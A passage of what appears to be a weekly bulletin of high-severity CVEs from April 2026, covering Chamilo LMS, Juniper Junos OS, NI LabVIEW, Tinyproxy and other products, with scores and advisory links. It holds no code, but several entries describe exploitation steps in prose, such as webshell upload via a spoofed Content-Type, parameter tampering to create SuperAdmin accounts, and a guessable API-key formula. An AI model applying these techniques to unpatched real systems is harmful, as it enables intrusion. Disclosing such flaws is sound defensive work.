=C2=A0 Dell--Elastic Cloud Storage Dell Elastic Cloud Storage, version 3.8.= 1.7 and prior, and Dell ObjectScale,=C2=A0versions prior to 4.1.0.3 and ver= sion 4.2.0.0, contains an Insertion of Sensitive Information into Log File = vulnerability. A low privileged attacker with local access could potentiall=
y exploit this vulnerability, leading to secret exposure. The attacker may =
be able to use the exposed secret to access the vulnerable system with priv= ileges of the compromised account. 2026-04-08 7.8 CVE-2026-28261 [ https://= www.cve.org/CVERecord?id=3DCVE-2026-28261 ] https://www.dell.com/support/kb= doc/en-us/000449325/dsa-2026-143-security-update-for-dell-objectscale-prior= -to-4-1-0-3-and-4-2-0-0-insertion-of-sensitive-information-into-log-file-vu= lnerability
=C2=A0 CouchCMS--CouchCMS CouchCMS contains a privilege escalation vulnerab= ility that allows authenticated Admin-level users to create SuperAdmin acco= unts by tampering with the f_k_levels_list parameter in user creation reque= sts. Attackers can modify the parameter value from 4 to 10 in the HTTP requ= est body to bypass authorization validation and gain full application contr= ol, circumventing restrictions on SuperAdmin account creation and privilege=
assignment. 2026-04-10 7.2 CVE-2026-29002 [ https://www.cve.org/CVERecord?= id=3DCVE-2026-29002 ] https://gist.github.com/thepiyushkumarshukla/477e2d2b= bbe8cc3ec0d640c50f0cf9e1
https://www.couchcms.com/ https://www.vulncheck.com/advisories/couchcms-privilege-escalation-via-f-k-= levels-list-parameter
=C2=A0 glpi-project--glpi GLPI is a free asset and IT management software p= ackage. From 10.0.0 to before 10.0.24 and 11.0.6, an authenticated user can=
perform a SQL injection via the logs export feature. This vulnerability is=
fixed in 10.0.24 and 11.0.6. 2026-04-06 7.2 CVE-2026-29047 [ https://www.c= ve.org/CVERecord?id=3DCVE-2026-29047 ] https://github.com/glpi-project/glpi= /security/advisories/GHSA-3m49-qf92-vccr
=C2=A0 open-telemetry--opentelemetry-go OpenTelemetry-Go is the Go implemen= tation of OpenTelemetry. From 1.36.0 to 1.40.0, multi-value baggage: header=
extraction parses each header field-value independently and aggregates mem= bers across values. This allows an attacker to amplify cpu and allocations =
by sending many baggage: header lines, even when each individual value is w= ithin the 8192-byte per-value parse limit. This vulnerability is fixed in 1= .41.0. 2026-04-07 7.5 CVE-2026-29181 [ https://www.cve.org/CVERecord?id=3DC= VE-2026-29181 ] https://github.com/open-telemetry/opentelemetry-go/security= /advisories/GHSA-mh2q-q3fh-2475
=C2=A0 Tinyproxy Project--Tinyproxy Tinyproxy through 1.11.3 is vulnerable =
to HTTP request parsing desynchronization due to a case-sensitive compariso=
n of the Transfer-Encoding header in src/reqs.c. The is_chunked_transfer() = function uses strcmp() to compare the header value against "chunked", even = though RFC 7230 specifies that transfer-coding names are case-insensitive. =
By sending a request with Transfer-Encoding: Chunked, an unauthenticated re= mote attacker can cause Tinyproxy to misinterpret the request as having no = body. In this state, Tinyproxy sets content_length.client to -1, skips pull= _client_data_chunked(), forwards request headers upstream, and transitions = into relay_connection() raw TCP forwarding while unread body data remains b= uffered. This leads to inconsistent request state between Tinyproxy and bac= kend servers. RFC-compliant backends (e.g., Node.js, Nginx) will continue w= aiting for chunked body data, causing connections to hang indefinitely. Thi=
s behavior enables application-level denial of service through backend work=
er exhaustion. Additionally, in deployments where Tinyproxy is used for req= uest-body inspection, filtering, or security enforcement, the unread body m=
ay be forwarded without proper inspection, resulting in potential security = control bypass. 2026-04-07 7.5 CVE-2026-31842 [ https://www.cve.org/CVEReco= rd?id=3DCVE-2026-31842 ] Upstream issue report and reproduction details [ h= ttps://github.com/tinyproxy/tinyproxy/issues/604 ]
Tinyproxy upstream project [ https://github.com/tinyproxy/tinyproxy ]
RFC 7230: transfer-coding names are case-insensitive [ https://datatracker.= ietf.org/doc/html/rfc7230 ]
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled re= quest parameters are directly used to set the PHP session ID before loading=
global bootstrap. This leads to session fixation. This vulnerability is fi= xed in 1.11.38 and 2.0.0-RC.3. 2026-04-10 7.5 CVE-2026-31940 [ https://www.= cve.org/CVERecord?id=3DCVE-2026-31940 ] https://github.com/chamilo/chamilo-= lms/security/advisories/GHSA-4gp7-cfjh-77gv https://github.com/chamilo/chamilo-lms/commit/ce0192c62e48c9d9474d915c541b3= 274844afbf9 https://github.com/chamilo/chamilo-lms/commit/e337b7cc74a0276a0b4f91f928220= 4d20cac1869
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request F= orgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_u= rl_with_open_graph accepts a URL from the user via the social_wall_new_msg_= main POST parameter and performs two server-side HTTP requests to that URL = without validating whether the target is an internal or external resource. = This allows an authenticated attacker to force the server to make arbitrary=
HTTP requests to internal services, scan internal ports, and access cloud = instance metadata. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. 2= 026-04-10 7.7 CVE-2026-31941 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 31941 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q74= c-mx8x-489h https://github.com/chamilo/chamilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5= c438c1bb265 https://github.com/chamilo/chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4ad= 737061e0ead
=C2=A0 chartbrew--chartbrew Chartbrew is an open-source web application tha=
t can connect directly to databases and APIs and use the data to create cha= rts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbre=
w in GET /team/:team_id/template/generate/:project_id. The GET handler call=
s checkAccess(req, "updateAny", "chart") without awaiting the returned prom= ise, and it does not verify that the supplied project_id belongs to req.par= ams.team_id or to the caller's team. As a result, an authenticated attacker=
with valid template-generation permissions in their own team can request t=
he template model for a project belonging to another team and receive victi=
m project data. This vulnerability is fixed in 4.9.0. 2026-04-10 7.7 CVE-20= 26-32252 [ https://www.cve.org/CVERecord?id=3DCVE-2026-32252 ] https://gith= ub.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj https://github.com/chartbrew/chartbrew/commit/bf5919043d3587fcbe76123aaabd9= a0a9d1033f1
=C2=A0 Red Hat--mirror registry for Red Hat OpenShift A flaw was found in R=
ed Hat Quay's container image upload process. An authenticated user with pu=
sh access to any repository on the registry can interfere with image upload=
s in progress by other users, including those in repositories they do not h= ave access to. This could allow the attacker to read, modify, or cancel ano= ther user's in-progress image upload. 2026-04-08 7.1 CVE-2026-32589 [ https= ://www.cve.org/CVERecord?id=3DCVE-2026-32589 ] https://access.redhat.com/se= curity/cve/CVE-2026-32589
RHBZ#2446963 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2446963 ]
=C2=A0 Red Hat--mirror registry for Red Hat OpenShift A flaw was found in R=
ed Hat Quay's handling of resumable container image layer uploads. The uplo=
ad process stores intermediate data in the database using a format that, if=
tampered with, could allow an attacker to execute arbitrary code on the Qu=
ay server. 2026-04-08 7.1 CVE-2026-32590 [ https://www.cve.org/CVERecord?id= =3DCVE-2026-32590 ] https://access.redhat.com/security/cve/CVE-2026-32590 RHBZ#2446964 [ https://bugzilla.redhat.com/show_bug.cgi?id=3D2446964 ]
=C2=A0 NI--LabVIEW There is a memory corruption vulnerability due to an out= -of-bounds write when loading a corrupted LVLIB file in NI LabVIEW.=C2=A0 T= his vulnerability may result in information disclosure or arbitrary code ex= ecution. Successful exploitation requires an attacker to get a user to open=
a specially crafted .lvlib file. This vulnerability affects NI LabVIEW 202=
6 Q1 (26.1.0) and prior versions. 2026-04-07 7.8 CVE-2026-32860 [ https://w= ww.cve.org/CVERecord?id=3DCVE-2026-32860 ] https://www.ni.com/en/support/se= curity/available-critical-and-security-updates-for-ni-software/2026/lv-proj= ect-library-file-parsing-memory-corruption-vulnerability-in-ni-labview.html =C2=A0 NI--LabVIEW There is a memory corruption vulnerability due to an out= -of-bounds write when loading a corrupted LVCLASS file in NI LabVIEW.=C2=A0=
This vulnerability may result in information disclosure or arbitrary code = execution. Successful exploitation requires an attacker to get a user to op=
en a specially crafted .lvclass file. This vulnerability affects NI LabVIEW=
2026 Q1 (26.1.0) and prior versions. 2026-04-07 7.8 CVE-2026-32861 [ https= ://www.cve.org/CVERecord?id=3DCVE-2026-32861 ] https://www.ni.com/en/suppor= t/security/available-critical-and-security-updates-for-ni-software/2026/lv-= class-file-parsing-memory-corruption-vulnerability-in-ni-labview.html
=C2=A0 NI--LabVIEW There is a memory corruption vulnerability due to an out= -of-bounds write in ResFileFactory::InitResourceMgr() in NI LabVIEW.=C2=A0 = This vulnerability may result in information disclosure or arbitrary code e= xecution. Successful exploitation requires an attacker to get a user to ope=
n a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q=
1 (26.1.0) and prior versions. 2026-04-07 7.8 CVE-2026-32862 [ https://www.= cve.org/CVERecord?id=3DCVE-2026-32862 ] https://www.ni.com/en/support/secur= ity/available-critical-and-security-updates-for-ni-software/2026/memory-cor= ruption-vulnerabilities-in-ni-labview.html
=C2=A0 NI--LabVIEW There is a memory corruption vulnerability due to an out= -of-bounds read in sentry_transaction_context_set_operation() in NI LabVIEW= .=C2=A0 This vulnerability may result in information disclosure or arbitrar=
y code execution. Successful exploitation requires an attacker to get a use=
r to open a specially crafted VI file. This vulnerability affects NI LabVIE=
W 2026 Q1 (26.1.0) and prior versions. 2026-04-07 7.8 CVE-2026-32863 [ http= s://www.cve.org/CVERecord?id=3DCVE-2026-32863 ] https://www.ni.com/en/suppo= rt/security/available-critical-and-security-updates-for-ni-software/2026/me= mory-corruption-vulnerabilities-in-ni-labview.html
=C2=A0 NI--LabVIEW There is a memory corruption vulnerability due to an out= -of-bounds read in mgcore_SH_25_3!aligned_free() in NI LabVIEW.=C2=A0 This = vulnerability may result in information disclosure or arbitrary code execut= ion. Successful exploitation requires an attacker to get a user to open a s= pecially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26= .1.0) and prior versions. 2026-04-07 7.8 CVE-2026-32864 [ https://www.cve.o= rg/CVERecord?id=3DCVE-2026-32864 ] https://www.ni.com/en/support/security/a= vailable-critical-and-security-updates-for-ni-software/2026/memory-corrupti= on-vulnerabilities-in-ni-labview.html
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) v= ulnerability in the gradebook result view page allows any authenticated tea= cher to delete any student's grade result across the entire platform by man= ipulating the delete_mark or resultdelete GET parameters. No ownership or c= ourse-scope verification is performed. This vulnerability is fixed in 1.11.=
38 and 2.0.0-RC.3. 2026-04-10 7.1 CVE-2026-32894 [ https://www.cve.org/CVER= ecord?id=3DCVE-2026-32894 ] https://github.com/chamilo/chamilo-lms/security= /advisories/GHSA-rqpg-p95v-fv98 https://github.com/chamilo/chamilo-lms/commit/3b03306d1a0301a81b9284e86893b= 27f518ab151 https://github.com/chamilo/chamilo-lms/commit/740f5a6e192a52a3adde3c3241c86= 401b1d2c519
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) v= ulnerability in the gradebook evaluation edit page allows any authenticated=
teacher to view and modify the settings (name, max score, weight) of evalu= ations belonging to any other course by manipulating the editeval GET param= eter. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. 2026-04-10 7.1=
CVE-2026-32930 [ https://www.cve.org/CVERecord?id=3DCVE-2026-32930 ] https= ://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6 https://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416d= a35aaa658dd https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3c= e4e4b80d79d
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in=
the exercise sound upload function allows an authenticated teacher to uplo=
ad a PHP webshell by spoofing the Content-Type header to audio/mpeg. The up= loaded file retains its original .php extension and is placed in a web-acce= ssible directory, enabling Remote Code Execution as the web server user (ww= w-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. 2026-04-10 = 7.5 CVE-2026-32931 [ https://www.cve.org/CVERecord?id=3DCVE-2026-32931 ] ht= tps://github.com/chamilo/chamilo-lms/security/advisories/GHSA-863j-h6pf-3xhx https://github.com/chamilo/chamilo-lms/commit/8cbe660de267f2b6ed625433bdfcf= 38dee8752b4 https://github.com/chamilo/chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190cd= d10bea457f3
=C2=A0 aces--Loris LORIS (Longitudinal Online Research and Imaging System) =
is a self-hosted web application that provides data- and project-management=
for neuroimaging research. Prior to 27.0.3 and 28.0.1, a SQL injection has=
been identified in some code sections for the MRI feedback popup window of=
the imaging browser. Attackers can use SQL ingestion to access/alter data =
on the server. This vulnerability is fixed in 27.0.3 and 28.0.1. 2026-04-08=
7.5 CVE-2026-33350 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33350 ] h= ttps://github.com/aces/Loris/security/advisories/GHSA-9r29-6jgc-3ggh
=C2=A0 Elastic--Kibana Incorrect Authorization (CWE-863) in Kibana can lead=
to information disclosure via Privilege Abuse (CAPEC-122). A user with lim= ited Fleet privileges can exploit an internal API endpoint to retrieve sens= itive configuration data, including private keys and authentication tokens,=
that should only be accessible to users with higher-level settings privile= ges. The endpoint composes its response by fetching full configuration obje= cts and returning them directly, bypassing the authorization checks enforce=
d by the dedicated settings APIs. 2026-04-08 7.7 CVE-2026-33461 [ https://w= ww.cve.org/CVERecord?id=3DCVE-2026-33461 ] https://discuss.elastic.co/t/kib= ana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-24/385812
=C2=A0 distribution--distribution Distribution is a toolkit to pack, ship, = store, and deliver container content. Prior to 3.1.0, in pull-through cache=
mode, distribution discovers token auth endpoints by parsing WWW-Authentic= ate challenges returned by the configured upstream registry. The realm URL = from a bearer challenge is used without validating that it matches the upst= ream registry host. As a result, an attacker-controlled upstream (or an att= acker with MitM position to the upstream) can cause distribution to send th=
e configured upstream credentials via basic auth to an attacker-controlled = realm URL. This vulnerability is fixed in 3.1.0. 2026-04-06 7.5 CVE-2026-33= 540 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33540 ] https://github.co= m/distribution/distribution/security/advisories/GHSA-3p65-76g6-3w7r
=C2=A0 themeum--Tutor LMS eLearning and online course solution The Tutor LM=
S - eLearning and online course solution plugin for WordPress is vulnerable=
to an Insecure Direct Object Reference in all versions up to, and includin=
g, 3.9.7. This is due to missing authentication and authorization checks in=
the `pay_incomplete_order()` function. The function accepts an attacker-co= ntrolled `order_id` parameter and uses it to look up order data, then write=
s billing fields to the order owner's profile (`$order_data->user_id`) with= out verifying the requester's identity or ownership. Because the Tutor nonc=
e (`_tutor_nonce`) is exposed on public frontend pages, this makes it possi= ble for unauthenticated attackers to overwrite the billing profile (name, e= mail, phone, address) of any user who has an incomplete manual order, by se= nding a crafted POST request with a guessed or enumerated `order_id`. 2026-= 04-10 7.5 CVE-2026-3360 [ https://www.cve.org/CVERecord?id=3DCVE-2026-3360 =
] https://www.wordfence.com/threat-intel/vulnerabilities/id/7f365519-dd0a-4= f39-880d-7216ce2f7d1e?source=3Dcve https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Tutor.p= hp#L563 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/Check= outController.php#L108 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/Check= outController.php#L1059 https://plugins.trac.wordpress.org/browser/tutor/trunk/ecommerce/CheckoutCo= ntroller.php#L1059 https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/ecommerce/= CheckoutController.php
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an Insecure Direct Obje=
ct Reference (IDOR) vulnerability in the Learning Path progress saving endp= oint. The file lp_ajax_save_item.php accepts a uid (user ID) parameter dire= ctly from $_REQUEST and uses it to load and modify another user's Learning = Path progress - including score, status, completion, and time - without ver= ifying that the requesting user matches the target user ID. Any authenticat=
ed user enrolled in a course can overwrite another user's Learning Path pro= gress by simply changing the uid parameter in the request. This vulnerabili=
ty is fixed in 1.11.38 and 2.0.0-RC.3. 2026-04-10 7.1 CVE-2026-33702 [ http= s://www.cve.org/CVERecord?id=3DCVE-2026-33702 ] https://github.com/chamilo/= chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654 https://github.com/chamilo/chamilo-lms/commit/6331d051b4468deb5830c01d1e047= c5e5cf2c74f https://github.com/chamilo/chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa19= 910417e4551
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38, any authenticated user (including students) can write arbit= rary content to files on the server via the BigUpload endpoint. The key par= ameter controls the filename and the raw POST body becomes the file content=
. While .php extensions are filtered to .phps, the .pht extension passes th= rough unmodified. On Apache configurations where .pht is handled as PHP, th=
is leads to Remote Code Execution. This vulnerability is fixed in 1.11.38. = 2026-04-10 7.1 CVE-2026-33704 [ https://www.cve.org/CVERecord?id=3DCVE-2026= -33704 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-ph= fx-pwwg-945v https://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3= c1d92e21c00
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38, any authenticated user with a REST API key can modify their=
own status field via the update_user_from_username endpoint. A student (st= atus=3D5) can change their status to Teacher/CourseManager (status=3D1), ga= ining course creation and management privileges. This vulnerability is fixe=
d in 1.11.38. 2026-04-10 7.1 CVE-2026-33706 [ https://www.cve.org/CVERecord= ?id=3DCVE-2026-33706 ] https://github.com/chamilo/chamilo-lms/security/advi= sories/GHSA-3gqc-xr75-pcpw https://github.com/chamilo/chamilo-lms/commit/0acf8a196307c66c049f97f5ff76c= f21c4a08127
=C2=A0 chamilo--chamilo-lms Chamilo LMS is a learning management system. Pr= ior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time()=
+ (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always = returns exactly 10000 (min =3D=3D max), making the formula effectively md5(= timestamp + user_id*5 - 10000). An attacker who knows a username and approx= imate key creation time can brute-force the API key. This vulnerability is = fixed in 1.11.38 and 2.0.0-RC.3. 2026-04-10 7.5 CVE-2026-33710 [ https://ww= w.cve.org/CVERecord?id=3DCVE-2026-33710 ] https://github.com/chamilo/chamil= o-lms/security/advisories/GHSA-rpmg-j327-mr39 https://github.com/chamilo/chamilo-lms/commit/4448701bb8ec557e94ef02d19c72c= be9c49c2d09 https://github.com/chamilo/chamilo-lms/commit/e7400dd840586ae134b286d0a2374= f3d269a9a9d
=C2=A0 saleor--saleor Saleor is an e-commerce platform. From 2.0.0 to befor=
e 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, Saleor supports query batching =
by submitting multiple GraphQL operations in a single HTTP request as a JSO=
N array but wasn't enforcing any upper limit on the number of operations. T= his allowed an unauthenticated attacker to send a single HTTP request many = operations (bypassing the per query complexity limit) to exhaust resources.=
This vulnerability is fixed in 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118. 2= 026-04-08 7.5 CVE-2026-33756 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 33756 ] https://github.com/saleor/saleor/security/advisories/GHSA-24jw-f244= -qfpp https://github.com/saleor/saleor/commit/7be352fa8c35875d6e66d36493ca7c14c10= 1bd64 https://github.com/saleor/saleor/commit/cdb66da97abb7c86939e384914cd8d9194f= 378e8 https://github.com/saleor/saleor/commit/d6a94e95bd77f3f733fa66afd1b1ac72e86= 3ca2a https://github.com/saleor/saleor/commit/e42aa4d6e588982e78942b033af051c8ec8= f43fa https://github.com/saleor/saleor/commit/f0371bdd4cafcc841f1a9e7049cead6133b= f7464
=C2=A0 Juniper Networks--CTP OS A Weak Password Requirements vulnerability =
in the password management function of Juniper Networks CTP OS might allow =
an unauthenticated, network-based attacker to exploit weak passwords of loc=
al accounts and potentially take full control of the device. The password m= anagement menu enables the administrator to set password complexity require= ments, but these settings are not saved. The issue can be verified with the=
menu option "Show password requirements". Failure to enforce the intended = requirements can lead to weak passwords being used, which significantly inc= reases the likelihood that an attacker can guess these and subsequently att= ain unauthorized access. This issue affects CTP OS versions 9.2R1 and 9.2R2=
. 2026-04-09 7.4 CVE-2026-33771 [ https://www.cve.org/CVERecord?id=3DCVE-20= 26-33771 ] https://kb.juniper.net/JSA107864
=C2=A0 Juniper Networks--Junos OS An Improper Validation of Syntactic Corre= ctness of Input vulnerability in the IPsec library used by kmd and iked of = Juniper Networks Junos OS on SRX Series and MX Series allows an unauthentic= ated, network-based attacker to cause a complete Denial-of-Service (DoS). I=
f an affected device receives a specifically malformed first ISAKMP packet = from the initiator, the kmd/iked process will crash and restart, which mome= ntarily prevents new security associations (SAs) for from being established=
. Repeated exploitation of this vulnerability causes a complete inability t=
o establish new VPN connections. This issue affects Junos OS on SRX Series = and MX Series: * all versions before 22.4R3-S9, * 23.2 version before 23.2R= 2-S6, * 23.4 version before 23.4R2-S7, * 24.2 versions before 24.2R2-S4, * = 24.4 versions before 24.4R2-S3, * 25.2 versions before 25.2R1-S2, 25.2R2. 2= 026-04-09 7.5 CVE-2026-33778 [ https://www.cve.org/CVERecord?id=3DCVE-2026-= 33778 ] https://kb.juniper.net/JSA107868
=C2=A0 Juniper Networks--Junos OS Evolved A Missing Authentication for Crit= ical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Jun= iper Networks Junos OS Evolved on PTX Series allows a local, authenticated = attacker with low privileges to gain direct access to FPCs installed in the=
device. A local user with low privileges can gain direct access to the ins= talled FPCs as a high privileged user, which can potentially lead to a full=
compromise of the affected component. This issue affects=C2=A0Junos OS Evo= lved on PTX10004, PTX10008, PTX100016, with JNP10K-LC1201 or JNP10K-LC1202:=
* All versions before 21.2R3-S8-EVO, * 21.4-EVO versions before 21.4R3-S7-= EVO, * 22.2-EVO versions before 22.2R3-S4-EVO, * 22.3-EVO versions before 2= 2.3R3-S3-EVO, * 22.4-EVO versions before 22.4R3-S2-EVO, * 23.2-EVO versions=
before 23.2R2-EVO. 2026-04-09 7.8 CVE-2026-33788 [ https://www.cve.org/CVE= Record?id=3DCVE-2026-33788 ] https://kb.juniper.net/JSA107806
=C2=A0 Juniper Networks--Junos OS An Improper Check for Unusual or Exceptio= nal Conditions vulnerability in the flow daemon (flowd) of Juniper Networks=
Junos OS on SRX Series allows an attacker sending a specific, malformed IC= MPv6 packet to cause the srxpfe process to crash and restart.=C2=A0Continue=
d receipt and processing of these packets will repeatedly crash the srxpfe = process and sustain the Denial of Service (DoS) condition. During NAT64 tra= nslation, receipt of a specific, malformed ICMPv6 packet destined to the de= vice will cause the srxpfe process to crash and restart. This issue cannot =
be triggered using IPv4 nor other IPv6 traffic. This issue affects Junos OS=
on SRX Series: * all versions before 21.2R3-S10, * all versions of 21.3, *=
from 21.4 before 21.4R3-S12, * all versions of 22.1, * from 22.2 before 22= .2R3-S8, * all versions of 22.4, * from 22.4 before 22.4R3-S9, * from 23.2 = before 23.2R2-S6, * from 23.4 before 23.4R2-S7, * from 24.2 before 24.2R2-S=
3, * from 24.4 before 24.4R2-S3, * from 25.2 before 25.2R1-S2, 25.2R2. 2026= -04-09 7.5 CVE-2026-33790 [ https://www.cve.org/CVERecord?id=3DCVE-2026-337=
90 ] https://kb.juniper.net/JSA107874
=C2=A0 Juniper Networks--Junos OS An Execution with Unnecessary Privileges = vulnerability=C2=A0in the User Interface (UI) of Juniper Networks Junos OS = and Junos OS Evolved allows a local, low-privileged attacker to gain root p= rivileges, thus compromising the system. When a=C2=A0configuration that all= ows unsigned Python op scripts is present on the device, a non-root user is=
able to execute malicious op scripts as a root-equivalent user, leading to=
privilege escalation.=C2=A0 This issue affects Junos OS:=C2=A0 * All versi= ons before 22.4R3-S7,=C2=A0 * from 23.2 before 23.2R2-S4,=C2=A0 * from 23.4=
before=C2=A023.4R2-S6, * from 24.2 before 24.2R1-S2, 24.2R2,=C2=A0 * from = 24.4 before 24.4R1-S2, 24.4R2;=C2=A0 Junos OS Evolved:=C2=A0 * All versions=
before 22.4R3-S7-EVO,=C2=A0 * from 23.2 before 23.2R2-S4-EVO,=C2=A0 * from=
23.4 before=C2=A023.4R2-S6-EVO, * from 24.2 before 24.2R2-EVO,=C2=A0 * fro=
m 24.4 before 24.4R1-S1-EVO, 24.4R2-EVO. 2026-04-09 7.8 CVE-2026-33793 [ ht= tps://www.cve.org/CVERecord?id=3DCVE-2026-33793 ] https://kb.juniper.net/JS= A103142
=C2=A0 Juniper Networks--Junos OS An Improper Input Validation vulnerabilit=
y in Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticat= ed, adjacent attacker, sending a specific genuine BGP packet in an already = established BGP session to reset only that session causing a Denial of Serv= ice (DoS). An attacker repeatedly sending the packet will sustain the Denia=
l of Service (DoS).This issue affects Junos OS: * 25.2 versions before 25.2=
R2 This issue doesn't not affected Junos OS versions before 25.2R1. This is= sue affects Junos OS Evolved: * 25.2-EVO versions before 25.2R2-EVO This is= sue doesn't not affected Junos OS Evolved versions before 25.2R1-EVO. eBGP = and iBGP are affected. IPv4 and IPv6 are affected. 2026-04-09 7.4 CVE-2026-= 33797 [ https://www.cve.org/CVERecord?id=3DCVE-2026-33797 ] https://kb.juni= per.net/JSA107850
=C2=A0 shamimmoeen--WCAPF Ajax Product Filter for WooCommerce WCAPF - WooCo= mmerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection=
via the 'post-author' parameter in all versions up to, and including, 4.2.=
3 due to insufficient escaping on the user supplied parameter and lack of s= ufficient preparation on the existing SQL query. This makes it possible for=
unauthenticated attackers to append additional SQL queries into already ex= isting queries that can be used to extract sensitive information from the d= atabase. 2026-04-08 7.5 CVE-2026-3396 [ https://www.cve.org/CVERecord?id=3D= CVE-2026-3396 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/e= e0a762e-9159-4dab-a7be-9cbe332effb1?source=3Dcve https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/inc= ludes/class-wcapf-product-filter.php#L739 https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/inc= ludes/class-wcapf-product-filter.php#L689 https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/inc= ludes/class-wcapf-product-filter.php#L81 https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/inc= ludes/class-wcapf-product-filter.php#L65 https://plugins.trac.wordpress.org/changeset/3484080/
=C2=A0 @fedify--fedify Fedify is a TypeScript library for building federate=
d server apps powered by ActivityPub. Prior to 1.9.6, 1.10.5, 2.0.8, and 2.= 1.1, @fedify/fedify follows HTTP redirects recursively in its remote docume=
nt loader and authenticated document loader without enforcing a maximum red= irect count or visited-URL loop detection. An attacker who controls a remot=
e ActivityPub key or actor URL can force a server using Fedify to make repe= ated outbound requests from a single inbound request, leading to resource c= onsumption and denial of service. This vulnerability is fixed in 1.9.6, 1.1= 0.5, 2.0.8, and 2.1.1. 2026-04-06 7.5 CVE-2026-34148 [ https://www.cve.org/= CVERecord?id=3DCVE-2026-34148 ] https://github.com/fedify-dev/fedify/securi= ty/advisories/GHSA-gm9m-gwc4-hwgp https://github.com/fedify-dev/fedify/releases/tag/1.10.5 https://github.com/fedify-dev/fedify/releases/tag/1.9.6 https://github.com/fedify-dev/fedify/releases/tag/2.0.8 https://github.com/fedify-dev/fedify/releases/tag/2.1.1
=C2=A0 AcademySoftwareFoundation--openexr OpenEXR provides the specificatio=
n and reference implementation of the EXR file format, an image storage for= mat for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and=
3.4.9, a misaligned memory write vulnerability exists in LossyDctDecoder_e= xecute() in src/lib/OpenEXRCore/internal_dwa_decoder.h:749. When decoding a=
DWA or DWAB-compressed EXR file containing a FLOAT-type channel, the decod=
er performs an in-place HALF=E2=86=92FLOAT conversion by casting an unalign=
ed uint8_t * row pointer to float * and writing through it. Because the row=
buffer may not be 4-byte aligned, this constitutes undefined behavior unde=
r the C standard and crashes immediately on architectures that enforce alig= nment (ARM, RISC-V, etc.). On x86 it is silently tolerated at runtime but r= emains exploitable via compiler optimizations that assume aligned access. T= his vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. 2026-04-06 7.1 CVE-2= 026-34379 [ https://www.cve.org/CVERecord?id=3DCVE-2026-34379 ] https://git= hub.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-w88v-vqh= q-5p24
https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9
=C2=A0 aces--Loris LORIS (Longitudinal Online Research and Imaging System) =
is a self-hosted web application that provides data- and project-management=
for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug =
in the static file router can allow an attacker to traverse outside of the = intended directory, allowing unintended files to be downloaded through the = static, css, and js endpoints. This vulnerability is fixed in 27.0.3 and 28= .0.1. 2026-04-08 7.5 CVE-2026-34392 [ https://www.cve.org/CVERecord?id=3DCV= E-2026-34392 ] https://github.com/aces/Loris/security/advisories/GHSA-rfj5-= 58hv-wc5f
=C2=A0 go-vikunja--vikunja Vikunja is an open-source self-hosted task manag= ement platform. Prior to 2.3.0, the OIDC callback handler issues a full JWT=
